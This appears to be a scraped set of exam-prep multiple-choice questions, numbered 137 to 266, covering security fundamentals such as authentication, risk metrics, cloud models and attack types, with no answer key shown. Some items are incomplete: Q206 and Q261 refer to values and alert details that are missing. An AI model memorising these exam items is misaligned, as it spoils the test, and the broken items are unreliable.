A new corporate policy requires all staff to use multifactor authentication to access company resources. Which of the following can be utilized to set up this form of identity and access management? (Select two)

A.

Authentication tokens

B.

Least privilege

C.

Biometrics

D.

LDAP

E.

Password vaulting

F.

SAML

Full Access
Question # 138

A company experiences a data loss event due to a stolen laptop. In order to prevent future similar events, a security analyst must implement a scalable solution to ensure all data on company laptops remains secure in the event of theft or loss. Which of the following should the analyst do next?

A.

Configure the HSM for each device and store recovery keys centrally.

B.

Implement LAPS to ensure secure password rotation for administrative accounts.

C.

Use an MDM platform to manage the devices and force security configurations.

D.

Ensure that each laptop has the secure enclave properly initialized in the BIOS.

Full Access
Question # 139

Which of the following explains the difference between data masking and data tokenization?

A.

Data masking is typically a non-reversible process, while data tokenization is reversible.

B.

Data masking uses encryption, while data tokenization replaces data with null values.

C.

Data masking uses one-to-one data mapping, while data tokenization uses one-to-many data mapping.

D.

Data masking implements a random function, while data tokenization implements a pseudo-random function.

Full Access
Question # 140

An organization is building a new backup data center with cost-benefit as the primary requirement and RTO and RPO values around two days. Which of the following types of sites is the best for this scenario?

A.

Real-time recovery

B.

Hot

C.

Cold

D.

Warm

Full Access
Question # 141

A human resources (HR) employee working from home leaves their company laptop open on the kitchen table. A family member walking through the kitchen reads an email from the Chief Financial Officer addressed to the HR department. The email contains information referencing company layoffs. The family member posts the content of the email to social media. Which of the following policies will the HR employee most likely need to review after this incident?

A.

Hybrid work environment

B.

Operations security

C.

Data loss prevention

D.

Social engineering

Full Access
Question # 142

Which of the following is the act of proving to a customer that software developers are trained on secure coding?

A.

Assurance

B.

Contract

C.

Due diligence

D.

Attestation

Full Access
Question # 143

An employee asks a security analyst to scan a suspicious email that contains a link to a file on a file-sharing site. The analyst determines that the file is safe after downloading and scanning the file with antivirus software. When the employee opens the file, their device is infected with ransomware. Which of the following steps should the analyst have taken?

A.

Review the file in a code editor.

B.

Monitor the file connections with netstat.

C.

Execute the file in a sandbox.

D.

Retrieve the file hash and check with OSINT.

Full Access
Question # 144

A security analyst is investigating an alert that was produced by endpoint protection software. The analyst determines this event was a false positive triggered by an employee who attempted to download a file. Which of the following is the most likely reason the download was blocked?

A.

A misconfiguration in the endpoint protection software

B.

A zero-day vulnerability in the file

C.

A supply chain attack on the endpoint protection vendor

D.

Incorrect file permissions

Full Access
Question # 145

Which of the following is the most likely motivation for a company administrator to look at an employee ' s personal information in a database?

A.

Ideological differences

B.

General curiosity

C.

Gain influence

D.

Intellectual property

Full Access
Question # 146

A security analyst is evaluating a SaaS application that the human resources department would like to implement. The analyst requests a SOC 2 report from the SaaS vendor. Which of the following processes is the analyst most likely conducting?

A.

Internal audit

B.

Penetration testing

C.

Attestation

D.

Due diligence

Full Access
Question # 147

An organization is implementing a COPE mobile device management policy. Which of the following should the organization include in the COPE policy? (Select two).

A.

Remote wiping of the device

B.

Data encryption

C.

Requiring passwords with eight characters

D.

Data usage caps

E.

Employee data ownership

F.

Personal application store access

Full Access
Question # 148

An administrator has identified and fingerprinted specific files that will generate an alert if an attempt is made to email these files outside of the organization. Which of the following best describes the tool the administrator is using?

A.

DLP

B.

SNMP traps

C.

SCAP

D.

IPS

Full Access
Question # 149

Two companies are in the process of merging. The companies need to decide how to standardize their information security programs. Which of the following would best align the security programs?

A.

Shared deployment of CIS baselines

B.

Joint cybersecurity best practices

C.

Both companies following the same CSF

D.

Assessment of controls in a vulnerability report

Full Access
Question # 150

Which of the following would be most useful in determining whether the long-term cost to transfer a risk is less than the impact of the risk?

A.

ARO

B.

RTO

C.

RPO

D.

ALE

E.

SLE

Full Access
Question # 151

The Chief Information Officer (CIO) asked a vendor to provide documentation detailing the specific objectives within the compliance framework that the vendor ' s services meet. The vendor provided a report and a signed letter stating that the services meet 17 of the 21 objectives. Which of the following did the vendor provide to the CIO?

A.

Penetration test results

B.

Self-assessment findings

C.

Attestation of compliance

D.

Third-party audit report

Full Access
Question # 152

A company ' s marketing department collects, modifies, and stores sensitive customer data. The infrastructure team is responsible for securing the data while in transit and at rest. Which of the following data roles describes the customer?

A.

Processor

B.

Custodian

C.

Subject

D.

Owner

Full Access
Question # 153

Which of the following is an example of a data protection strategy that uses tokenization?

A.

Encrypting databases containing sensitive data

B.

Replacing sensitive data with surrogate values

C.

Removing sensitive data from production systems

D.

Hashing sensitive data in critical systems

Full Access
Question # 154

A security officer observes that a software development team is not complying with its corporate security policy on encrypting confidential data. Which of the following categories refers to this type of non-compliance?

A.

External

B.

Standard

C.

Regulation

D.

Internal

Full Access
Question # 155

A company is utilizing an offshore team to help support the finance department. The company wants to keep the data secure by keeping it on a company device but does not want to provide equipment to the offshore team. Which of the following should the company implement to meet this requirement?

A.

VDI

B.

MDM

C.

VPN

D.

VPC

Full Access
Question # 156

An administrator must replace an expired SSL certificate. Which of the following does the administrator need to create the new SSL certificate?

A.

CSR

B.

OCSP

C.

Key

D.

CRL

Full Access
Question # 157

Which of the following can be best used to discover a company ' s publicly available breach information?

A.

OSINT

B.

SIEM

C.

CVE

D.

CVSS

Full Access
Question # 158

A company’s legal department drafted sensitive documents in a SaaS application and wants to ensure the documents cannot be accessed by individuals in high-risk countries. Which of the following is the most effective way to limit this access?

A.

Data masking

B.

Encryption

C.

Geolocation policy

D.

Data sovereignty regulation

Full Access
Question # 159

A systems administrator is redesigning now devices will perform network authentication. The following requirements need to be met:

• An existing Internal certificate must be used.

• Wired and wireless networks must be supported

• Any unapproved device should be Isolated in a quarantine subnet

• Approved devices should be updated before accessing resources

Which of the following would best meet the requirements?

A.

802.IX

B.

EAP

C.

RADIUS

D.

WPA2

Full Access
Question # 160

An IT administrator needs to ensure data retention standards are implemented on an enterprise application. Which of the following describes the administrator ' s role?

A.

Processor

B.

Custodian

C.

Privacy officer

D.

Owner

Full Access
Question # 161

A security analyst must identify abnormal behavior on the server. Which of the following does the analyst most likely need to do?

A.

Disable unnecessary ports.

B.

Patch the system.

C.

Establish baselines.

D.

Perform alert tuning.

Full Access
Question # 162

An organization has been experiencing issues with deleted network share data and improperly assigned permissions. Which of the following would best help track and remediate these issues?

A.

DLP

B.

EDR

C.

FIM

D.

ACL

Full Access
Question # 163

A company wants to reduce the time and expense associated with code deployment. Which of the following technologies should the company utilize?

A.

Serverless architecture

B.

Thin clients

C.

Private cloud

D.

Virtual machines

Full Access
Question # 164

A security analyst is concerned malicious actors are lurking in an environment but has not received any alerts regarding suspicious activity. Which of the following should the analyst conduct to further investigate the presence of these actors?

A.

Threat hunting

B.

Digital forensics

C.

Vulnerability scanning

D.

E-discovery

Full Access
Question # 165

An organization with multiple geographic locations has invested in various internet circuits at each location, including MPLS, 4G/5G, broadband, and dial-up. An architect is configuring a solution that will allow locations to function consistently and leverage links based on specific criteria. Which of the following is the best solution for the architect to configure?

A.

SD-WAN

B.

UTM

C.

VPN

D.

SASE

Full Access
Question # 166

An IT security team is concerned about the confidentiality of documents left unattended in MFPs. Which of the following should the security team do to mitigate the situation?

A.

Educate users about the importance of paper shredder devices.

B.

Deploy an authentication factor that requires ln-person action before printing.

C.

Install a software client m every computer authorized to use the MFPs.

D.

Update the management software to utilize encryption.

Full Access
Question # 167

Which of the following is the first step to secure a newly deployed server?

A.

Close unnecessary service ports.

B.

Update the current version of the software.

C.

Add the device to the ACL.

D.

Upgrade the OS version.

Full Access
Question # 168

A data administrator is configuring authentication for a SaaS application and would like to reduce the number of credentials employees need to maintain. The company prefers to use domain credentials to access new SaaS applications. Which of the following methods would allow this functionality?

A.

SSO

B.

LEAP

C.

MFA

D.

PEAP

Full Access
Question # 169

A business received a small grant to migrate its infrastructure to an off-premises solution. Which of the following should be considered first?

A.

Security of cloud providers

B.

Cost of implementation

C.

Ability of engineers

D.

Security of architecture

Full Access
Question # 170

An organization recently updated its security policy to include the following statement:

Regular expressions are included in source code to remove special characters such as $, |, ;. & , `, and ? from variables set by forms in a web application.

Which of the following best explains the security technique the organization adopted by making this addition to the policy?

A.

Identify embedded keys

B.

Code debugging

C.

Input validation

D.

Static code analysis

Full Access
Question # 171

A company implemented an MDM policy 10 mitigate risks after repealed instances of employees losing company-provided mobile phones. In several cases. The lost phones were used maliciously to perform social engineering attacks against other employees. Which of the following MDM features should be configured to best address this issue? (Select two).

A.

Screen locks

B.

Remote wipe

C.

Full device encryption

D.

Push notifications

E.

Application management

F.

Geolocation

Full Access
Question # 172

An organization authorizes system deployment on the network after reducing the number of Category 1 vulnerabilities to zero. Which of the following is this scenario an example of?

A.

Risk avoidance

B.

Risk tolerance

C.

Risk transference

D.

Risk reporting

Full Access
Question # 173

A Chief Information Security Officer would like to conduct frequent, detailed reviews of systems and procedures to track compliance objectives. Which of the following is the best method to achieve this objective?

A.

Third-party attestation

B.

Penetration testing

C.

Internal auditing

D.

Vulnerability scans

Full Access
Question # 174

A security administrator needs to reduce the attack surface in the company ' s data centers. Which of the following should the security administrator do to complete this task?

A.

Implement a honeynet.

B.

Define Group Policy on the servers.

C.

Configure the servers for high availability.

D.

Upgrade end-of-support operating systems.

Full Access
Question # 175

A Chief Information Security Officer wants to monitor the company ' s servers for SQLi attacks and allow for comprehensive investigations if an attack occurs. The company uses SSL decryption to allow traffic monitoring. Which of the following strategies would best accomplish this goal?

A.

Logging all NetFlow traffic into a SIEM

B.

Deploying network traffic sensors on the same subnet as the servers

C.

Logging endpoint and OS-specific security logs

D.

Enabling full packet capture for traffic entering and exiting the servers

Full Access
Question # 176

A security administrator ' s account accesses company IT systems from an airport. Shortly after, the administrator ' s manager asks about critical configuration changes made by the administrator ' s account. The administrator was not aware of these changes. Which of the following attack methods did the attacker most likely use?

A.

Rogue access point

B.

Shoulder surfing

C.

Skimming

D.

Keylogger

Full Access
Question # 177

To which of the following security categories does an EDR solution belong?

A.

Physical

B.

Operational

C.

Managerial

D.

Technical

Full Access
Question # 178

Which of the following explains how regular patching helps mitigate risks when securing an enterprise environment?

A.

It improves server performance by reducing software bugs.

B.

It addresses known software vulnerabilities before they are exploited.

C.

It eliminates the need for firewalls and intrusion detection.

D.

It removes the need for antivirus tools.

Full Access
Question # 179

Which of the following control types involves restricting IP connectivity to a router ' s web management interface to protect it from being exploited by a vulnerability?

A.

Corrective

B.

Physical

C.

Preventive

D.

Managerial

Full Access
Question # 180

Which of the following best explains a concern with OS-based vulnerabilities?

A.

An exploit would give an attacker access to system functions that span multiple applications.

B.

The OS vendor ' s patch cycle is not frequent enough to mitigate the large number of threats.

C.

Most users trust the core operating system features and may not notice if the system has been compromised.

D.

Exploitation of an operating system vulnerability is typically easier than any other vulnerability.

Full Access
Question # 181

A company has yearly engagements with a service provider. The general terms and conditions are the same for all engagements. The company wants to simplify the process and revisit the general terms every three years. Which of the following documents would provide the best way to set the general terms?

A.

MSA

B.

NDA

C.

MOU

D.

SLA

Full Access
Question # 182

A security team purchases a tool for cloud security posture management. The team is quickly overwhelmed by the number of misconfigurations that the tool detects. Which of the following should the security team configure to establish workflows for cloud resource security?

A.

CASB

B.

IAM

C.

SOAR

D.

XDR

Full Access
Question # 183

An administrator is creating a secure method for a contractor to access a test environment. Which of the following would provide the contractor with the best access to the test environment?

A.

Application server

B.

Jump server

C.

RDP server

D.

Proxy server

Full Access
Question # 184

An employee receives a text message that appears to have been sent by the payroll department and is asking for credential verification. Which of the following social engineering techniques are being attempted? (Choose two.)

A.

Typosquatting

B.

Phishing

C.

Impersonation

D.

Vishing

E.

Smishing

F.

Misinformation

Full Access
Question # 185

Which of the following is used to protect a computer from viruses, malware, and Trojans being installed and moving laterally across the network?

A.

IDS

B.

ACL

C.

EDR

D.

NAC

Full Access
Question # 186

A security analyst is creating base for the server team to follow when hardening new devices for deployment. Which of the following beet describes what the analyst is creating?

A.

Change management procedure

B.

Information security policy

C.

Cybersecurity framework

D.

Secure configuration guide

Full Access
Question # 187

A company relies on open-source software libraries to build the software used by its customers. Which of the following vulnerability types would be the most difficult to remediate due to the company ' s reliance on open-source libraries?

A.

Buffer overflow

B.

SQL injection

C.

Cross-site scripting

D.

Zero day

Full Access
Question # 188

A penetration test identifies that an SMBvl Is enabled on multiple servers across an organization. The organization wants to remediate this vulnerability in the most efficient way possible. Which of the following should the organization use for this purpose?

A.

GPO

B.

ACL

C.

SFTP

D.

DLP

Full Access
Question # 189

An external vendor recently visited a company ' s headquarters tor a presentation. Following the visit a member of the hosting team found a file that the external vendor left behind on a server. The file contained detailed architecture information and code snippets. Which of the following data types best describes this file?

A.

Government

B.

Public

C.

Proprietary

D.

Critical

Full Access
Question # 190

An enterprise has been experiencing attacks focused on exploiting vulnerabilities in older browser versions with well-known exploits. Which of the following security solutions should be configured to best provide the ability to monitor and block these known signature-based attacks?

A.

ACL

B.

DLP

C.

IDS

D.

IPS

Full Access
Question # 191

In which of the following will unencrypted PLC management traffic most likely be found?

A.

SDN

B.

IoT

C.

VPN

D.

SCADA

Full Access
Question # 192

A company must ensure sensitive data at rest is rendered unreadable. Which of the following will the company most likely use?

A.

Hashing

B.

Tokenization

C.

Encryption

D.

Segmentation

Full Access
Question # 193

Which of the following should a security operations center use to improve its incident response procedure?

A.

Playbooks

B.

Frameworks

C.

Baselines

D.

Benchmarks

Full Access
Question # 194

A security manager wants to reduce the number of steps required to identify and contain basic threats. Which of the following will help achieve this goal?

A.

SOAR

B.

SIEM

C.

DMARC

D.

NIDS

Full Access
Question # 195

A Chief Security Officer signs off on a request to allow inbound SMB and RDP from the internet to a single VLAN. Which of the following is the most likely explanation for this activity?

A.

The company built a new file-sharing site.

B.

The organization is preparing for a penetration test.

C.

The security team is integrating with an SASE platform.

D.

The security team created a honeynet.

Full Access
Question # 196

Which of the following best explains a core principle of a Zero Trust security model?

A.

Devices connected to the internal network are automatically trusted after initial authentication.

B.

Access to resources is granted only after strict identity verification and continuous monitoring.

C.

Security policies require multifactor authentication for remote access to sensitive data.

D.

Network access is limited by role, and access controls are reviewed on a regular schedule.

Full Access
Question # 197

A database administrator is updating the company ' s SQL database, which stores credit card information for pending purchases. Which of the following is the best method to secure the data against a potential breach?

A.

Hashing

B.

Obfuscation

C.

Tokenization

D.

Masking

Full Access
Question # 198

While a school district is performing state testing, a security analyst notices all internet services are unavailable. The analyst discovers that ARP poisoning is occurring on the network and then terminates access for the host. Which of the following is most likely responsible for this malicious activity?

A.

Unskilled attacker

B.

Shadow IT

C.

Credential stuffing

D.

DMARC failure

Full Access
Question # 199

An organization is struggling with scaling issues on its VPN concentrator and internet circuit due to remote work. The organization is looking for a software solution that will allow it to reduce traffic on the VPN and internet circuit, while still providing encrypted tunnel access to the data center and monitoring of remote employee internet traffic. Which of the following will help achieve these objectives?

A.

Deploying a SASE solution to remote employees

B.

Building a load-balanced VPN solution with redundant internet

C.

Purchasing a low-cost SD-WAN solution for VPN traffic

D.

Using a cloud provider to create additional VPN concentrators

Full Access
Question # 200

A security analyst has determined that a security breach would have a financial impact of $15,000 and is expected to occur twice within a three-year period. Which of the following is the ALE for this risk?

A.

$7,500

B.

$10,000

C.

$15,000

D.

$30,000

Full Access
Question # 201

An administrator wants to perform a risk assessment without using proprietary company information. Which of the following methods should the administrator use to gather information?

A.

Network scanning

B.

Penetration testing

C.

Open-source intelligence

D.

Configuration auditing

Full Access
Question # 202

Which of the following vulnerabilities will input validation prevent?

A.

DNS hijacking

B.

Time-of-check

C.

SQL injection

D.

Sideloading

Full Access
Question # 203

A systems administrator needs to provide traveling employees with a tool that will protect company devices regardless of where they are working. Which of the following should the administrator implement?

A.

Isolation

B.

Segmentation

C.

ACL

D.

HIPS

Full Access
Question # 204

An administrator discovers that some files on a database server were recently encrypted. The administrator sees from the security logs that the data was last accessed by a domain user. Which of the following best describes the type of attack that occurred?

A.

Insider threat

B.

Social engineering

C.

Watering-hole

D.

Unauthorized attacker

Full Access
Question # 205

A security practitioner completes a vulnerability assessment on a company ' s network and finds several vulnerabilities, which the operations team remediates. Which of the following should be done next?

A.

Conduct an audit.

B.

Initiate a penetration test.

C.

Rescan the network.

D.

Submit a report.

Full Access
Question # 206

A security administrator recently reset local passwords and the following values were recorded in the system:

Question # 206

Which of the following in the security administrator most likely protecting against?

A.

Account sharing

B.

Weak password complexity

C.

Pass-the-hash attacks

D.

Password compromise

Full Access
Question # 207

The marketing department set up its own project management software without telling the appropriate departments. Which of the following describes this scenario?

A.

Shadow IT

B.

Insider threat

C.

Data exfiltration

D.

Service disruption

Full Access
Question # 208

A security analyst needs to propose a remediation plan ' or each item in a risk register. The item with the highest priority requires employees to have separate logins for SaaS solutions and different password complexity requirements for each solution. Which of the following implementation plans will most likely resolve this security issue?

A.

Creating a unified password complexity standard

B.

Integrating each SaaS solution with the Identity provider

C.

Securing access to each SaaS by using a single wildcard certificate

D.

Configuring geofencing on each SaaS solution

Full Access
Question # 209

Which of the following security concepts is being followed when implementing a product that offers protection against DDoS attacks?

A.

Availability

B.

Non-repudiation

C.

Integrity

D.

Confidentiality

Full Access
Question # 210

The Cyber Incident Response Team is reviewing an incident that involved a human resources recruiter exfiltrating sensitive company data. The team found that the recruiter was able to use HTTP over port 53 to upload documents to a web server. Which of the following security infrastructure devices could have identified and blocked this activity?

A.

WAF utilizing SSL decryption

B.

NGFW utilizing application inspection

C.

UTM utilizing a threat feed

D.

SD-WAN utilizing IPsec

Full Access
Question # 211

Which of the following techniques would identify whether data has been modified in transit?

A.

Hashing

B.

Tokenization

C.

Masking

D.

Encryption

Full Access
Question # 212

An IT team rolls out a new management application that uses a randomly generated MFA token sent to the administrator’s phone. Despite this new MFA precaution, there is a security breach of the same software. Which of the following describes this kind of attack?

A.

Smishing

B.

Typosquatting

C.

Espionage

D.

Pretexting

Full Access
Question # 213

After a recent ransomware attack on a company ' s system, an administrator reviewed the log files. Which of the following control types did the administrator use?

A.

Compensating

B.

Detective

C.

Preventive

D.

Corrective

Full Access
Question # 214

Which of the following digital forensics activities would a security team perform when responding to legal requests in a pending investigation?

A.

E-discovery

B.

User provisioning

C.

Firewall log export

D.

Root cause analysis

Full Access
Question # 215

The private key for a website was stolen, and a new certificate has been issued. Which of the following needs to be updated next?

A.

SCEP

B.

CRL

C.

OCSP

D.

CSR

Full Access
Question # 216

A growing organization, which hosts an externally accessible application, adds multiple virtual servers to improve application performance and decrease the resource usage on individual servers Which of the following solutions is the organization most likely to employ to further increase performance and availability?

A.

Load balancer

B.

Jump server

C.

Proxy server

D.

SD-WAN

Full Access
Question # 217

Which of the following best represents an application that does not have an on-premises requirement and is accessible from anywhere?

A.

Pass

B.

Hybrid cloud

C.

Private cloud

D.

IaaS

E.

SaaS

Full Access
Question # 218

A new employee can select a particular make and model of an employee workstation from a preapproved list. Which of the following is this an example of?

A.

MDM

B.

CYOD

C.

PED

D.

COPE

Full Access
Question # 219

Which of the following describes the understanding between a company and a client about what will be provided and the accepted time needed to provide the company with the resources?

A.

SLA

B.

MOU

C.

MOA

D.

BPA

Full Access
Question # 220

Which of the following security controls is a company implementing by deploying HIPS? (Select two)

A.

Directive

B.

Preventive

C.

Physical

D.

Corrective

E.

Compensating

F.

Detective

Full Access
Question # 221

A security analyst estimates that a small security incident will cost $10,000 and will occur twice per year. The analyst recommends a budget of $20,000 for next year. Which of the following does the $10,000 represent?

A.

ARO

B.

SLE

C.

ALE

D.

RPO

Full Access
Question # 222

Which of the following is used to validate a certificate when it is presented to a user?

A.

OCSP

B.

CSR

C.

CA

D.

CRC

Full Access
Question # 223

An employee clicked a link in an email from a payment website that asked the employee to update contact information. The employee entered the log-in information but received a “page not found” error message. Which of the following types of social engineering attacks occurred?

A.

Brand impersonation

B.

Pretexting

C.

Typosquatting

D.

Phishing

Full Access
Question # 224

While reviewing logs, a security administrator identifies the following code:

< script > function(send_info) < /script >

Which of the following best describes the vulnerability being exploited?

A.

XSS

B.

SQLi

C.

DDoS

D.

CSRF

Full Access
Question # 225

While considering the organization ' s cloud-adoption strategy, the Chief Information Security Officer sets a goal to outsource patching of firmware, operating systems, and applications to the chosen cloud vendor. Which of the following best meets this goal?

A.

Community cloud

B.

PaaS

C.

Containerization

D.

Private cloud

E.

SaaS

F.

laaS

Full Access
Question # 226

Which of the following is most likely associated with introducing vulnerabilities on a corporate network by the deployment of unapproved software?

A.

Hacktivists

B.

Script kiddies

C.

Competitors

D.

Shadow IT

Full Access
Question # 227

Which of the following data protection strategies can be used to confirm file integrity?

A.

Masking

B.

Encryption

C.

Hashing

D.

Obfuscation

Full Access
Question # 228

A manager receives an email that contains a link to receive a refund. After hovering over the link, the manager notices that the domain ' s URL points to a suspicious link. Which of the following security practices helped the manager to identify the attack?

A.

End user training

B.

Policy review

C.

URL scanning

D.

Plain text email

Full Access
Question # 229

An analyst wants to move data from production to the UAT server to test the latest release. Which of the following strategies should the analyst use to protect sensitive data from being viewed by the testing team?

A.

Data masking

B.

Data tokenization

C.

Data obfuscation

D.

Data encryption

Full Access
Question # 230

A company decided to reduce the cost of its annual cyber insurance policy by removing the coverage for ransomware attacks.

Which of the following analysis elements did the company most likely use in making this decision?

A.

IMTTR

B.

RTO

C.

ARO

D.

MTBF

Full Access
Question # 231

Which of the following uses proprietary controls and is designed to function in harsh environments over many years with limited remote access management?

A.

ICS

B.

Microservers

C.

Containers

D.

IoT

Full Access
Question # 232

Which of the following is required for an organization to properly manage its restore process in the event of system failure?

A.

IRP

B.

DRP

C.

RPO

D.

SDLC

Full Access
Question # 233

Which of the following is a directive managerial control?

A.

Acceptable use policy

B.

Login warning banner

C.

Master service agreement

D.

No trespassing sign

Full Access
Question # 234

Which of the following is a risk of conducting a vulnerability assessment?

A.

A disruption of business operations

B.

Unauthorized access to the system

C.

Reports of false positives

D.

Finding security gaps in the system

Full Access
Question # 235

Which of the following threat actors would most likely target an organization by using a logic bomb within an internally-developed application?

A.

Nation-state

B.

Trusted insider

C.

Organized crime group

D.

Hacktivist

Full Access
Question # 236

A company deploys a new server that a client must be able to access it at all times. Which of the following will support this availability requirement?

A.

Proxy server

B.

Jump server

C.

Geographic restrictions

D.

Load balancer

Full Access
Question # 237

Which of the following should an internal auditor check for first when conducting an audit of the organization ' s risk management program?

A.

Policies and procedures

B.

Asset management

C.

Vulnerability assessment

D.

Business impact analysts

Full Access
Question # 238

An organization wants to donate its aging network hardware. Which of the following should the organization perform to prevent any network details from leaking?

A.

Destruction

B.

Sanitization

C.

Certification

D.

Data retention

Full Access
Question # 239

Which of the following best explains how open service ports increase an organization ' s attack surface?

A.

They are commonly overlooked by endpoint antivirus tools during scans.

B.

They can make the company’s remote entry point available to the internet.

C.

They enable automatic application updates to reduce vulnerability windows.

D.

They can expose unnecessary services to unauthorized access if not properly restricted.

Full Access
Question # 240

An organization implemented cloud-managed IP cameras to monitor building entry points and sensitive areas. The service provider enables direct TCP/IP connection to stream live video footage from each camera. The organization wants to ensure this stream is encrypted and authenticated. Which of the following protocols should be implemented to best meet this objective?

A.

SSH

B.

SRTP

C.

S/MIME

D.

PPTP

Full Access
Question # 241

A security analyst is investigating an application server and discovers that software on the server is behaving abnormally. The software normally runs batch jobs locally and does not generate traffic, but the process is now generating outbound traffic over random high ports. Which of the following vulnerabilities has likely been exploited in this software?

A.

Memory injection

B.

Race condition

C.

Side loading

D.

SQL injection

Full Access
Question # 242

Which of the following is the most relevant reason a DPO would develop a data inventory?

A.

To manage data storage requirements better

B.

To determine the impact in the event of a breach

C.

To extend the length of time data can be retained

D.

To automate the reduction of duplicated data

Full Access
Question # 243

A company wants to ensure that only authorized devices can enter an environment. Which of the following will the company most likely use to implement the control?

A.

Access lists

B.

Remote connection

C.

Screened subnets

D.

Centralized proxy

Full Access
Question # 244

Which of the following methods would most likely be used to identify legacy systems?

A.

Bug bounty program

B.

Vulnerability scan

C.

Package monitoring

D.

Dynamic analysis

Full Access
Question # 245

Which of the following should be used to ensure an attacker is unable to read the contents of a mobile device ' s drive if the device is lost?

A.

TPM

B.

ECC

C.

FDE

D.

HSM

Full Access
Question # 246

The security team at a large global company needs to reduce the cost of storing data used for performing investigations. Which of the following types of data should have its retention length reduced?

A.

Packet capture

B.

Endpoint logs

C.

OS security logs

D.

Vulnerability scan

Full Access
Question # 247

A security analyst scans a company ' s public network and discovers a host is running a remote desktop that can be used to access the production network. Which of the following changes should the security analyst recommend?

A.

Changing the remote desktop port to a non-standard number

B.

Setting up a VPN and placing the jump server inside the firewall

C.

Using a proxy for web connections from the remote desktop server

D.

Connecting the remote server to the domain and increasing the password length

Full Access
Question # 248

The executive management team is mandating the company develop a disaster recovery plan. The cost must be kept to a minimum, and the money to fund additional internet connections is not available. Which of the following would be the best option?

A.

Hot site

B.

Cold site

C.

Failover site

D.

Warm site

Full Access
Question # 249

A systems administrator wants to prevent users from being able to access data based on their responsibilities. The administrator also wants to apply the required access structure via a simplified format. Which of the following should the administrator apply to the site recovery resource group?

A.

RBAC

B.

ACL

C.

SAML

D.

GPO

Full Access
Question # 250

A company prevented direct access from the database administrators’ workstations to the network segment that contains database servers. Which of the following should a database administrator use to access the database servers?

A.

Jump server

B.

RADIUS

C.

HSM

D.

Load balancer

Full Access
Question # 251

An external security assessment report indicates a high click rate on suspicious emails. The Chief Intelligence Security Officer (CISO) must reduce this behavior. Which of the following should the CISO do first?

A.

Update the acceptable use policy.

B.

Deploy a password management solution.

C.

Issue warning letters to affected users.

D.

Implement a phishing awareness campaign.

Full Access
Question # 252

A network security analyst monitors the network’s IDS, which has flagged unusual activity. The IDS has detected multiple login attempts to a database server within a short period. These attempts come from various IP addresses that are not normally recognized by the network’s usual traffic patterns. Each attempt uses the same username and password. Based on the following log output (corrected formatting for readability):

2025-04-10 14:22:01.4532 — Source IP: 192.168.15.101 — Status: Failed — User: JDoe — Action: Login Attempt

2025-04-10 14:22:02.1122 — Source IP: 192.168.15.102 — Status: Failed — User: JDoe — Action: Login Attempt

2025-04-10 14:22:02.7835 — Source IP: 192.168.15.103 — Status: Failed — User: JDoe — Action: Login Attempt

2025-04-10 14:22:03.5637 — Source IP: 192.168.15.104 — Status: Failed — User: JDoe — Action: Login Attempt

2025-04-10 14:22:04.9474 — Source IP: 192.168.15.105 — Status: Failed — User: JDoe — Action: Login Attempt

2025-04-10 14:22:05.5673 — Source IP: 192.168.15.106 — Status: Failed — User: JDoe — Action: Login Attempt

2025-04-10 14:22:06.1573 — Source IP: 192.168.15.107 — Status: Failed — User: JDoe — Action: Login Attempt

2025-04-10 14:22:07.7462 — Source IP: 192.168.15.108 — Status: Failed — User: JDoe — Action: Login Attempt

Which of the following types of network attacks is most likely occurring?

A.

Cross-site scripting

B.

Credential replay

C.

Distributed denial of service

D.

SQL injection

Full Access
Question # 253

Which of the following would be the best way to block unknown programs from executing?

A.

Access control list

B.

Application allow list.

C.

Host-based firewall

D.

DLP solution

Full Access
Question # 254

Which of the following should a technician perform to verify the integrity of a file transferred from one device to another?

A.

Authentication

B.

Obfuscation

C.

Hashing

D.

Encryption

Full Access
Question # 255

Which of the following is the most likely to be included as an element of communication in a security awareness program?

A.

Reporting phishing attempts or other suspicious activities

B.

Detecting insider threats using anomalous behavior recognition

C.

Verifying information when modifying wire transfer data

D.

Performing social engineering as part of third-party penetration testing

Full Access
Question # 256

Which of the following can best contribute to prioritizing patch applications?

A.

CVSS

B.

SCAP

C.

OSINT

D.

CVE

Full Access
Question # 257

Which of the following describes a vulnerability where a website under heavy load performs an unauthorized write operation seconds after the user authenticates?

A.

CSRF

B.

TOU

C.

SQLi

D.

XSS

Full Access
Question # 258

Following a security review, an organization must ensure users verify their identities against the company ' s identity services with individual credentials leveraging WPA2-Enterprise for wireless access. Which of the following configuration steps correctly applies RADIUS in this environment?

A.

Enabling 802.1X authentication and integrating it with the corporate directory

B.

Installing self-signed certificates on all user devices

C.

Enabling MAC filters for all wireless clients

D.

Configuring the wireless controller to require multifactor authentication

Full Access
Question # 259

The internal audit team determines a software application is no longer in scope for external reporting requirements. Which of the following will confirm management’s perspective that the application is no longer applicable?

A.

Data inventory and retention

B.

Right to be forgotten

C.

Due care and due diligence

D.

Acknowledgement and attestation

Full Access
Question # 260

A hacker gained access to a system via a phishing attempt that was a direct result of a user clicking a suspicious link. The link laterally deployed ransomware, which laid dormant for multiple weeks, across the network. Which of the following would have mitigated the spread?

A.

IPS

B.

IDS

C.

WAF

D.

UAT

Full Access
Question # 261

A security analyst receives an alert from a corporate endpoint used by employees to issue visitor badges. The alert contains the following details:

Which of the following best describes the indicator that triggered the alert?

A.

Blocked content

B.

Brute-force attack

C.

Concurrent session usage

D.

Account lockout

Full Access
Question # 262

Which of the following types of vulnerabilities involves attacking a system to access adjacent hosts?

A.

VM escape

B.

Side loading

C.

Remote code execution

D.

Resource exhaustion

Full Access
Question # 263

Which of the following would be the best ways to ensure only authorized personnel can access a secure facility? (Select two).

A.

Fencing

B.

Video surveillance

C.

Badge access

D.

Access control vestibule

E.

Sign-in sheet

F.

Sensor

Full Access
Question # 264

A wireless administrator sets up a new network in a small office using a password. The network must reduce the impact of brute-force attacks if the password is subjected to over-the-air interception. Which of the following security settings will help achieve this goal?

A.

WIPS

B.

SSO

C.

WPS

D.

SAE

Full Access
Question # 265

A penetration test has demonstrated that domain administrator accounts were vulnerable to pass-the-hash attacks. Which of the following would have been the best strategy to prevent the threat actor from using domain administrator accounts?

A.

Audit each domain administrator account weekly for password compliance.

B.

Implement a privileged access management solution.

C.

Create IDS policies to monitor domain controller access.

D.

Use Group Policy to enforce password expiration.

Full Access
Question # 266

A company discovered its data was advertised for sale on the dark web. During the initial investigation, the company determined the data was proprietary data. Which of the following is the next step the company should take?

A.

Identity the attacker sentry methods.

B.

Report the breach to the local authorities.

C.

Notify the applicable parties of the breach.

D.

Implement vulnerability scanning of the company ' s systems.

Full Access